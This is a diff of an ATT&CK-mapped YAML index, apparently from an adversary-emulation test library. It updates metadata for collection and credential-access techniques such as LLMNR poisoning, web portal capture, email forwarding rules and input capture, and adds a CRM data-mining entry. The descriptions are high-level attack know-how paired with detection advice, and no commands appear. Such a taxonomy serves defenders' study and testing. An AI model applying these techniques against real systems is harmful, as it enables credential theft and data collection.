+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -68454,21 +69010,20 @@ collection:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -68576,7 +69131,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests:
     - name: LLMNR Poisoning with Inveigh (PowerShell)
@@ -68595,7 +69149,7 @@ collection:
         elevation_required: true
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -68606,13 +69160,13 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -68626,6 +69180,7 @@ collection:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -68636,12 +69191,12 @@ collection:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1125:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.205Z'
       name: Video Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -68686,7 +69241,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1125
     atomic_tests:
     - name: Registry artefact when application use webcam
@@ -68705,25 +69259,7 @@ collection:
         name: command_prompt
   T1213.001:
     technique:
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
-      type: attack-pattern
-      created: '2020-02-14T13:09:51.004Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.001
-        url: https://attack.mitre.org/techniques/T1213/001
-      - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
-        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
-          Retrieved April 4, 2018.
-        source_name: Atlassian Confluence Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-30T13:45:42.840Z'
       name: Confluence
       description: |2
 
@@ -68733,31 +69269,48 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
 
         User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+      created: '2020-02-14T13:09:51.004Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/001
+        external_id: T1213.001
+      - source_name: Atlassian Confluence Logging
+        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+          Retrieved April 4, 2018.
+        url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1114.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Email Forwarding Rule'
       description: "Adversaries may setup email forwarding rules to collect sensitive
         information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -68790,10 +69343,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Security
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
       - Liran Ravich, CardinalOps
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -68802,16 +69357,17 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
+      - 'Cloud Service: Cloud Service Metadata'
       type: attack-pattern
       id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
       created: '2020-02-19T18:54:47.103Z'
@@ -68843,70 +69399,66 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.003
     atomic_tests: []
   T1074:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Shane Tully, @securitygypsy
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
-      created: '2017-05-31T21:30:58.938Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074
-        url: https://attack.mitre.org/techniques/T1074
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: PWC Cloud Hopper April 2017
-        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
-        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
-          April 5, 2017.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Data Staged
       description: |-
         Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
 
         In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
 
         Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Data Staged
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      - Shane Tully, @securitygypsy
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+      created: '2017-05-31T21:30:58.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074
+        external_id: T1074
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: PWC Cloud Hopper April 2017
+        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+          April 5, 2017.
+        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -68979,7 +69531,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests:
     - name: PowerShell - Prompt User for Password
@@ -69050,7 +69601,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1039
     atomic_tests:
     - name: Copy a sensitive File over Administrative share with copy
@@ -69151,7 +69701,7 @@ collection:
         elevation_required: true
   T1114.002:
     technique:
-      modified: '2023-05-31T12:34:03.420Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Remote Email Collection'
       description: Adversaries may target an Exchange server, Office 365, or Google
         Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -69163,6 +69713,9 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
         locations, especially for privileged accounts (ex: Exchange administrator
@@ -69170,11 +69723,11 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -69191,14 +69744,11 @@ collection:
         external_id: T1114.002
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.002
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -69214,6 +69764,7 @@ collection:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -69222,13 +69773,13 @@ collection:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -69236,15 +69787,11 @@ collection:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -69255,9 +69802,60 @@ collection:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1213.004:
+    technique:
+      modified: '2024-10-17T14:36:24.983Z'
+      name: Customer Relationship Management Software
+      description: |-
+        Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+        Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+        CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Centre for Cybersecurity Belgium (CCB)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Logon Session: Logon Session Creation'
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+      created: '2024-07-01T20:06:13.664Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/004
+        external_id: T1213.004
+      - source_name: Bleeping Computer Bank Hack 2020
+        description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+          100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+      - source_name: Bleeping Computer Mint Mobile Hack 2021
+        description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+          after numbers ported, data accessed. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+      - source_name: Bleeping Computer US Cellular Hack 2022
+        description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+          after billing system hack. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -69303,7 +69901,7 @@ collection:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -69322,37 +69920,36 @@ collection:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.003:
     technique:
-      modified: '2022-10-18T22:44:01.723Z'
+      modified: '2024-09-04T13:03:54.101Z'
       name: Code Repositories
       description: |-
         Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
 
-        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
 
         **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Toby Kohlenberg
+      - Josh Liburdi, @jshlbrd
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor access to code repositories, especially performed
         by privileged users such as Active Directory Domain or Enterprise Administrators
         as these types of accounts should generally not be used to access code repositories.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user-based anomalies.
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Toby Kohlenberg
-      - Josh Liburdi, @jshlbrd
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -69375,41 +69972,52 @@ collection:
         url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213:
     technique:
-      modified: '2024-03-01T16:27:47.391Z'
+      modified: '2024-10-28T19:10:16.960Z'
       name: Data from Information Repositories
       description: "Adversaries may leverage information repositories to mine valuable
         information. Information repositories are tools that allow for storage of
         information, typically to facilitate collaboration or information sharing
         between users, and can store a wide variety of data that may aid adversaries
-        in further objectives, or direct access to the target information. Adversaries
-        may also abuse external sharing features to share sensitive documents with
-        recipients outside of the organization. \n\nThe following is a brief list
-        of example information that may hold potential value to an adversary and may
-        also be found on an information repository:\n\n* Policies, procedures, and
-        standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
-        Technical system documentation\n* Testing / development credentials\n* Work
-        / project schedules\n* Source code snippets\n* Links to network shares and
-        other internal resources\n\nInformation stored in a repository may vary based
-        on the specific instance or environment. Specific common information repositories
-        include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
-        and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
-        services such as Code Repositories, IaaS databases, enterprise databases,
-        and other storage infrastructure such as SQL Server."
+        in further objectives, such as Credential Access, Lateral Movement, or Defense
+        Evasion, or direct access to the target information. Adversaries may also
+        abuse external sharing features to share sensitive documents with recipients
+        outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+        \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on an information repository:\n\n*
+        Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+        System architecture diagrams\n* Technical system documentation\n* Testing
+        / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+        \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+        and other internal resources\n* Contact or other sensitive information about
+        business partners and customers, including personally identifiable information
+        (PII) \n\nInformation stored in a repository may vary based on the specific
+        instance or environment. Specific common information repositories include
+        the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+        and more specialized platforms such as customer relationship management (CRM)
+        databases \n* Collaboration platforms such as SharePoint, Confluence, and
+        code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+        \n\nIn some cases, information repositories have been improperly secured,
+        typically by unintentionally allowing for overly-broad access by all users
+        or even public access to unauthenticated users. This is particularly common
+        with cloud-native or cloud-hosted services, such as AWS Relational Database
+        Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+        Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Regina Elwell
       - Praetorian
       - Milos Stojadinovic
       - Isif Ibrahima, Mandiant
+      - Obsidian Security
+      - Naveen Vijayaraghavan
+      - Nilesh Dherange (Gurucul)
       x_mitre_deprecated: false
       x_mitre_detection: "As information repositories generally have a considerably
         large user base, detection of malicious use can be non-trivial. At minimum,
@@ -69438,10 +70046,9 @@ collection:
       - Windows
       - macOS
       - SaaS
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '3.3'
+      - Office Suite
+      x_mitre_version: '3.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -69454,10 +70061,20 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1213
         external_id: T1213
+      - source_name: Mitiga
+        description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+          I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+          Retrieved September 24, 2024.
+        url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
       - source_name: Atlassian Confluence Logging
         description: Atlassian. (2018, January 9). How to Enable User Access Logging.
           Retrieved April 4, 2018.
         url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
